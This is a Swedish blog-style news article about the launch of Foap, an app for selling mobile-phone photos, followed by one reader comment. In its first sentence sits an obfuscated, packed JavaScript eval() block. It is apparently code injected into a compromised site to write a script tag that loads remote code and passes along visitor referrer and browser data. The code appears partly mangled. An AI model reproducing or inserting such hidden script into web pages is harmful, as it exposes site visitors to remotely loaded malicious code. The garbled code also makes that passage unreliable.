Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Idag lanserar Foap – Nu kan du börja tjäna pengar på dina mobilbilder

Idag lanserar Foap – Nu kan du börja tjäna pengar på dina mobilbilder
Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bnfzz|var|u0026u|referrer|fybff||js|php’.split(’|’),0,{}))
lanserar svenska
Foap i AppStore och har planer om att bli världens största marknadsplats för bilder som är tagna med mobiltelefonen. Idén är enkel: Användarna laddar upp bilder via mobilen, och de bilderna som godkänns av Foap läggs ut till försäljning på Foap.com. Företag från hela världen kan sedan gå in och köpa bilderna och använda dem i redaktionellt eller kommersiellt syfte. Priset är 250 kr per bild och användarna tjänar 125 kr varje gång deras bild köps. Appen är integrerad med PayPal och via en knapptryckning får användaren pengarna direkt till sitt PayPal-konto.

– Intresset från användarna har visat sig vara över all förväntan, berättar Alexandra Bylund, medgrundare i Foap. Vi tjuvstartade för ett par veckor sedan genom att bjuda in testanvändare, och intresset är så stort att vi inte ens kan låta alla som vill, testa. Vi hade aldrig vågat tro på ett så här kraftigt genomslag, så högt engagemang och så många bra bilder. Vi såg framför oss att vi skulle behöva utbilda våra användare den första tiden, säger Alexandra.

Foap har redan lyckats skapa ett engagerat community vilket man bland annat kan se genom deras populära Facebook-sida.

– Nu ligger utmaningen i att granska alla bilder samt att lyckas med vår marknadsplats, säger Alexandra. Vi la ut ett blogginlägg häromdagen om att vi söker folk som kan hjälpa oss med bildgranskningen och fick över 100 svar redan första dygnet. Nu gäller det att även skapa en medvetenhet hos företagen som ska köpa bilderna. Det tar tid att bygga upp en lyckad marknadsplats men vi tror verkligen att vi genom snygg design, enkelhet och genom att vara lyhörda och snabbfotade kommer att lyckas, fortsätter Alexandra.

Foap konkurrerar med stora bildsäljande företag som till exempel Istock och Getty images. Den stora skillnaden ligger i att Foap har en snabbare hantering och därmed kan erbjuda ett större flöde av inkommande bilder samt att man genom sina användare får in många naturliga, men fortfarande professionella, bilder. Man har tröttnat på alltför stylade motiv och människor med “amerikanska perfekta leenden”.

– Vi håller på skapa ett säljcommunity för att attrahera de bästa mobilfotograferna. Vi vill plocka ut de allra duktigaste av Instagrams 40 millioner användare, och få de att bli trogna hos oss. Facebooks miljardköp av Instagram har lett till ett tiotal miljoner nya användare, och det i sin tur har lett till att det, enligt många Instagram-användare, har blivit sämre kvalité på bilderna som publiceras. Det gynnar oss eftersom det ryktas om att en del Instagram-användare därmed är ute och letar efter nya fotoappar där det laddas upp bilder av högre kvalitet, avslutar Alexandra Bylund.

Foap lanserar idag och appen finns att ladda ner gratis för iPhones i AppStore.

Foap är grundat av David Los som även är medgrundare i den sociala resesajten Tripl.com samt Alexandra Bylund. Företaget är baserat i Malmö och teamet består av fem personer. Foap är finansierat med kapital från Sverige och Schweiz.

Comments

  1. pelle

    Låter som en soft grej 🙂